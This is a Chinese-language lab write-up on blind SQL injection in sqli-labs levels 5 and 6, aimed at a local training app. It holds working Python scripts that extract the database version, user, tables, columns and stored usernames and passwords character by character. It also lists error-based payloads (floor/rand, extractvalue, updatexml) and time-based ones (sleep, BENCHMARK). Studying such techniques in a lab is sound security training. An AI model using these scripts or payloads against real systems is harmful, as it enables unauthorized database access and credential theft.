sqli-labs:5-6,盲注
思考1:当# --+都被过滤时,只能考虑闭合处理
思考2:union联合注入时必须先判断字段长度
eg. id=1' order by 3 and '1'='1
sqli5:
首先判断出对id经过了'处理
其次发现结果不再回显
ok那就盲注了,先判断mysql版本,版本过低可优先考虑dns边信道攻击。
bool盲注(and逻辑)的脚本(substr)
1 # -*- coding: utf-8 -*- 2 """ 3 Created on Sat Mar 23 16:03:43 2019 4 5 @author: kenshin 6 """ 7 8 import requests,re 9 url = 'http://localhost/sqli-labs/Less-5/?id=1' 10 pattern_mark = 'You are in...........' 11 12 def get_version(url): 13 #mysql版本标准:x.x.xx 14 #假设lstsion长度为5 15 lst = ['#' for x in range(0, 5)] 16 lst[1] = lst[3] = '.' 17 for i in (1,3,5,6): 18 for ii in range(48,58): 19 payload = "\' and ascii(substr((select version()),"+str(i)+",1))="+str(ii)+" --+" 20 url_new = url + payload 21 r = requests.get(url_new) 22 if(re.findall(pattern_mark,r.text)): 23 lst[i-1] = str(ii-48) 24 break 25 sr = ''.join(lst) 26 print("the lstsion of mysql:"+sr) 27 28 def get_user(url): 29 #假设user()长度为15 30 lst = ['#' for x in range(0,15)] 31 for i in range(1,16): 32 for ii in 'qwertyuiopasdfghjklzxcvbnm1234567890_-@': 33 payload = "\' and substr((select user()),"+str(i)+",1)='"+ii+"' --+" 34 url_new = url + payload 35 r = requests.get(url_new) 36 if(re.findall(pattern_mark,r.text)): 37 lst[i-1] = ii 38 print(ii) 39 break 40 sr = ''.join(lst) 41 print("the user of database: "+sr) 42 43 def get_datadir(url): 44 #假设@@datadir长度为32 45 lst = ['#' for x in range(0,32)] 46 for i in range(1,33): 47 for ii in ':\\qwertyuiopasdfghjklzxcvbnm1234567890_-': 48 payload = "\' and substr((select @@datadir),"+str(i)+",1)='"+ii+"' --+" 49 url_new = url + payload 50 r = requests.get(url_new) 51 if(re.findall(pattern_mark,r.text)): 52 lst[i-1] = ii 53 print(ii) 54 break 55 sr = ''.join(lst) 56 print(sr) 57 58 def get_currTB(url): 59 #假设当前数据库最多有10个表[i标识] 60 for i in range(0,10): 61 #假设最长的表名长度为10[ii标识] 62 lst = ['#' for x in range(0,10)] 63 for ii in range(1,11): 64 for iii in 'qwertyuiopasdfghjklzxcvbnm1234567890_-#': 65 payload = "\' and substr((select * from information_schema.tables where table_schema=database() limit "+str(i)+",1),"+str(ii)+",1)='"+str(iii)+"' --+" 66 url_new = url + payload 67 r = requests.get(url_new) 68 if(re.findall(pattern_mark,r.text)): 69 lst[ii-1] = iii 70 print(iii) 71 break 72 if(lst[ii-1] == '#'): 73 break 74 sr = ''.join(lst) 75 print(sr) 76 77 def get_Column(url,tb): 78 #假设当前列最多有3个字段[i标识] 79 for i in range(0,3): 80 #假设每个字段最长的数据长度为10 81 lst = ['#' for x in range(0,10)] 82 for ii in range(1,11): 83 for iii in '@qwertyuiopasdfghjklzxcvbnm1234567890_-#': 84 payload = "\' and substr((select column_name from information_schema.columns where table_name='"+tb+"' limit "+str(i)+",1),"+str(ii)+",1)='"+str(iii)+"' --+" 85 url_new = url + payload 86 r = requests.get(url_new) 87 if(re.findall(pattern_mark,r.text)): 88 lst[ii-1] = iii 89 print(iii) 90 break 91 if(lst[ii-1] == '#'): 92 break 93 sr = ''.join(lst) 94 print(sr) 95 def get_data(url): 96 #假设当前列有10条数据[i标识] 97 for i in range(1,11): 98 #假设每条数据最长的数据长度为25 99 lst = ['#' for x in range(0,25)] 100 for ii in range(1,26): 101 for iii in '%@qwertyuiopasdfghjklzxcvbnm1234567890_-#': 102 #变量太多,payload一些变量在代码端自行设置TT 103 payload = "' and substr((select group_concat(id,'%',username,'%',password) from security.users where id="+str(i)+"),"+str(ii)+",1)='"+str(iii)+"' --+" 104 url_new = url + payload 105 r = requests.get(url_new) 106 if(re.findall(pattern_mark,r.text)): 107 lst[ii-1] = iii 108 print(iii) 109 break 110 if(lst[ii-1] == '#'): 111 break 112 sr = ''.join(lst) 113 print(sr) 114 """ 115 dnslog 116 """ 117 118 119 #get_lstsion(url) 120 #get_user(url) 121 #get_datadir(url) 122 #get_currTB(url) 123 #tb = input("select table >> ") 124 #get_Column(url,tb) 125 get_data(url)
# -*- coding: utf-8 -*- """ Created on Sat Mar 23 16:03:43 2019 @author: kenshin """ import requests,re,time,sys url = 'http://localhost/sqli-labs/Less-5/?id=1' pattern_mark = 'You are in...........' def view_bar(num,total): rate = num / total rate_num = int(rate * 100) r = '\r[%d%%]%s>' % (rate_num,'='*num) sys.stdout.write(r) sys.stdout.flush() def get_version(url): #mysql版本标准:x.x.xx #假设lstsion长度为5 lst = ['#' for x in range(0, 6)] lst[1] = lst[3] = '.' for i in (1,3,5,6): view_bar(i,6) for ii in range(48,58): payload = "\' and ascii(substr((select version()),"+str(i)+",1))="+str(ii)+" --+" url_new = url + payload r = requests.get(url_new) if(re.findall(pattern_mark,r.text)): lst[i-1] = str(ii-48) break sr = ''.join(lst) print("\nthe version of mysql:"+sr) def get_user(url): #假设user()长度为15 lst = ['#' for x in range(0,15)] for i in range(1,16): view_bar(i,15) for ii in 'qwertyuiopasdfghjklzxcvbnm1234567890_-@': payload = "\' and substr((select user()),"+str(i)+",1)='"+ii+"' --+" url_new = url + payload r = requests.get(url_new) if(re.findall(pattern_mark,r.text)): lst[i-1] = ii break sr = ''.join(lst) print("\n the user of database: "+sr) def get_datadir(url): #假设@@datadir长度为32 lst = ['#' for x in range(0,32)] for i in range(1,33): view_bar(i,32) for ii in ':\\qwertyuiopasdfghjklzxcvbnm1234567890_-': payload = "\' and substr((select @@datadir),"+str(i)+",1)='"+ii+"' --+" url_new = url + payload r = requests.get(url_new) if(re.findall(pattern_mark,r.text)): lst[i-1] = ii break sr = ''.join(lst) print(sr) time_end=time.time() print("\ntotally cost: "+str(time_end-time_start) + "s") def get_currTB(url): #假设当前数据库最多有10个表[i标识] for i in range(0,4): view_bar(i,3) #假设最长的表名长度为10[ii标识] lst = ['#' for x in range(0,10)] for ii in range(1,11): for iii in 'qwertyuiopasdfghjklzxcvbnm1234567890_-#': payload = "\' and substr((select table_name from information_schema.tables where table_schema=database() limit "+str(i)+",1),"+str(ii)+",1)='"+str(iii)+"' --+" url_new = url + payload r = requests.get(url_new) if(re.findall(pattern_mark,r.text)): lst[ii-1] = iii break if(lst[ii-1] == '#'): break sr = ''.join(lst) print("\n"+sr) def get_Column(url,tb): #假设当前列最多有3个字段[i标识] for i in range(0,3): view_bar(i,2) #假设每个字段最长的数据长度为10 lst = ['#' for x in range(0,10)] for ii in range(1,11): for iii in '@qwertyuiopasdfghjklzxcvbnm1234567890_-#': payload = "\' and substr((select column_name from information_schema.columns where table_name='"+tb+"' limit "+str(i)+",1),"+str(ii)+",1)='"+str(iii)+"' --+" url_new = url + payload r = requests.get(url_new) if(re.findall(pattern_mark,r.text)): lst[ii-1] = iii break if(lst[ii-1] == '#'): break sr = ''.join(lst) print("\n"+sr) def get_data(url): time_start=time.time() #假设当前列有10条数据[i标识] for i in range(1,11): view_bar(i,10) #假设每条数据最长的数据长度为25 lst = ['#' for x in range(0,25)] for ii in range(1,26): for iii in '%@qwertyuiopasdfghjklzxcvbnm1234567890_-#': #变量太多,payload一些变量在代码端自行设置TT payload = "' and substr((select group_concat(id,'%',username,'%',password) from security.users where id="+str(i)+"),"+str(ii)+",1)='"+str(iii)+"' --+" url_new = url + payload r = requests.get(url_new) if(re.findall(pattern_mark,r.text)): lst[ii-1] = iii break if(lst[ii-1] == '#'): break sr = ''.join(lst) print("\n"+sr) time_end=time.time() print("totally cost: "+str(time_end-time_start) + "s") """ dnslog """ #get_version(url) #get_user(url) #get_datadir(url) #get_currTB(url) #tb = input("select table >> ") #get_Column(url,tb) #get_data(url)
环境均为mysql 5.5.3
(left)
' and left(version(),1)=5--+(php5.2版本可用,瞎报)
' and left(database(),1)=>'a'--+(php5+版本可用
(substr)
' and substr((select database() limit 0,1),1,1)>'z'--+(php5+版本可用)
(regexp)
' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^username')--+(php5+版本可用)
(mid)
' and mid((SELECT IFNULL(CAST(username AS CHAR),0x20) FROM security.users ORDER BY id LIMIT 0,1),1,1)='d'--+(php5+版本可用)
补充:ascill和ord()可将字符转换为ascill码
sqli-6
对id经过了"处理
floor(rand(0)*2)报错(php 5+版本可用)
-1' union Select 1,count(*),concat(0x7e,(select user()),0x7e,floor(rand(0)*2))a from information_schema.columns group by a--+
=>root@localhost
database()
@@datadir
...
-1' union select 1,count(*),concat(0x7e,(select schema_name from information_schema.schemata limit 4,1),0x7e,floor(rand(0)*2))a from information_schema.columns group by a--+
=>security
-1' union select 1,count(*),concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e,floor(rand(0)*2))a from information_schema.columns group by a--+
=>users
-1' union select 1,count(*),concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x7e,floor(rand(0)*2))a from information_schema.columns group by a--+
=>password
-1' union select 1,count(*),concat(0x7e,(select password from security.users limit 0,1),0x7e,floor(rand(0)*2))a from information_schema.columns group by a--+
=>Dump
1 # -*- coding: utf-8 -*- 2 """ 3 Created on Sun Mar 24 09:56:20 2019 4 5 @author: kenshin 6 """ 7 8 import requests,re 9 url = 'http://localhost/sqli-labs/Less-5/?id=-1' 10 pattern_mark = '~(.+?)~' 11 12 def get_currDB(url): 13 payload = "\' union select 1,count(*),concat(0x7e,(select database()),0x7e,floor(rand(0)*2))a from information_schema.columns group by a--+" 14 url += payload 15 r = requests.get(url) 16 rst=re.findall(pattern_mark,r.text) 17 print(rst) 18 19 get_currDB(url)
xpath函数报错
1' and extractvalue(1,concat(0x7e,(select @@version),0x7e)) --+
=>5.5.53
利用数据的重复性
-1' union select 1,2,3 from (select NAME_CONST(version(),1), NAME_CONST(version(),1))x --+
...
updatexml
1' and (updatexml(1,concat(0x7e,(select user()),0x7e),1))--+
sleep延时注入
1' and If(substr(database(),1,1)='s',1,sleep(5))--+
BENCHMARK延时注入
1' UNION SELECT (IF(SUBSTRING(current,1,1)='s',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null)),2,3 FROM (select database() as current) as tb1--+
